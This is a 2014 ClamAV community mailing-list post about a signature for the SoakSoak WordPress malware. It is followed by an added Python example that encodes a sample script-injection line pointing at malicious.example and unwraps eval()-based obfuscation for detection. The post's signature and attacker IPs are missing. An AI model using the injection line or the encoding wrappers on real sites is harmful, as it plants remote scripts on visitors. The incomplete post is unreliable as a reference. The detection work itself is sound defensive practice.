[Community-sigs] JS.SoakSoak signature

Willian Cruz willianalbertocruz at outlook.com.br
Wed Dec 17 17:41:27 EST 2014

Good night guys,
First of all, thanks Shaun, you were right about ClamAV not decoding the eval() in the JavaScript. Using the dump left by ClamAV I could create the sig and it's working now.
This sig can now detect both encoded and decoded HTML and JS files that contain the malware. The sig follows: 
According to data collected by Sucuri, the attacks came from these IP addresses: and, so I recommend giving these addresses to Cisco for further investigation.
As a sample I used the code released by Sucuri in a JS test file; you can see the code in this article from Ars Technica: http://arstechnica.com/security/2014/12/some-100000-or-more-wordpress-sites-infected-by-mysterious-malware/
I got the IPs from Sucuri's blog: http://blog.sucuri.net/2014/12/revslider-vulnerability-leads-to-massive-wordpress-soaksoak-compromise.html
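The point made in the message above (ClamAV does not evaluate the eval() layer, so a signature has to be written against the text the scanner actually sees, or the layer has to be unwrapped first, before one signature can cover both the encoded and the decoded copy) can be illustrated with a small stand-alone detector. This is an added example, not the signature from the post and not ClamAV's own normalizer: the sample script, the malicious.example URL, the eval(String.fromCharCode(...)) and eval(unescape("...")) wrappers and the signature regex are all constructed here for illustration and are not the SoakSoak payload.

```python
import re
import urllib.parse

# Constructed sample (NOT the SoakSoak payload): a script-injection line, and the
# same line wrapped in the eval(String.fromCharCode(...)) layer that a scanner
# sees when it does not evaluate eval() itself.
PLAINTEXT = "document.write(\"<script src='http://malicious.example/x.js'></script>\");"
ENCODED = "eval(String.fromCharCode(%s));" % ",".join(str(ord(c)) for c in PLAINTEXT)
# A second, hypothetical layer: the encoded form wrapped again in eval(unescape("...")).
DOUBLE_ENCODED = 'eval(unescape("%s"));' % urllib.parse.quote(ENCODED, safe="")

# Hypothetical signature written against the *decoded* script text.
SIGNATURE = re.compile(r"document\.write\(\s*[\"']<script")

EVAL_WRAP = re.compile(r"^\s*eval\((.*)\)\s*;?\s*$", re.S)
FROMCHARCODE = re.compile(r"String\.fromCharCode\(\s*([\d\s,]*)\)")
UNESCAPE = re.compile(r"unescape\(\s*([\"'])(.*)\1\s*\)", re.S)


def _js_unescape(s):
    """Emulate JavaScript unescape(): %uXXXX first, then %XX sequences."""
    s = re.sub(r"%u([0-9A-Fa-f]{4})", lambda m: chr(int(m.group(1), 16)), s)
    return urllib.parse.unquote(s)


def unwrap_eval(js, max_depth=8):
    """Peel eval(String.fromCharCode(...)) and eval(unescape('...')) layers.

    Returns the innermost script text. Stops when the outer expression is not
    an eval() of one of the two recognised decoders, or after max_depth layers
    (a guard against pathological nesting). Anything else is returned as-is.
    """
    for _ in range(max_depth):
        m = EVAL_WRAP.match(js)
        if not m:
            break
        arg = m.group(1).strip()
        fc = FROMCHARCODE.fullmatch(arg)
        if fc:
            js = "".join(chr(int(n)) for n in fc.group(1).split(",") if n.strip())
            continue
        un = UNESCAPE.fullmatch(arg)
        if un:
            js = _js_unescape(un.group(2))
            continue
        break
    return js


def scan(js, normalize=True):
    """Return True if SIGNATURE matches the script.

    With normalize=False the signature is applied to the raw text, which is what
    happens when the scanner leaves the eval() layer in place: the decoded copy
    matches, the encoded copy does not. With normalize=True the layers are
    peeled first, so one signature covers both copies.
    """
    text = unwrap_eval(js) if normalize else js
    return SIGNATURE.search(text) is not None


if __name__ == "__main__":
    for label, sample in (("decoded", PLAINTEXT), ("encoded", ENCODED), ("double", DOUBLE_ENCODED)):
        print("%-8s raw match: %-5s  normalized match: %s"
              % (label, scan(sample, normalize=False), scan(sample)))
```

The practical consequence is the one the post arrives at: either write the signature against the form left in the scanner's dump (the still-wrapped eval() text), or normalize before matching. A signature on the decoded text alone misses every wrapped copy, and a signature on one wrapped copy misses the same script re-encoded with different character codes.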
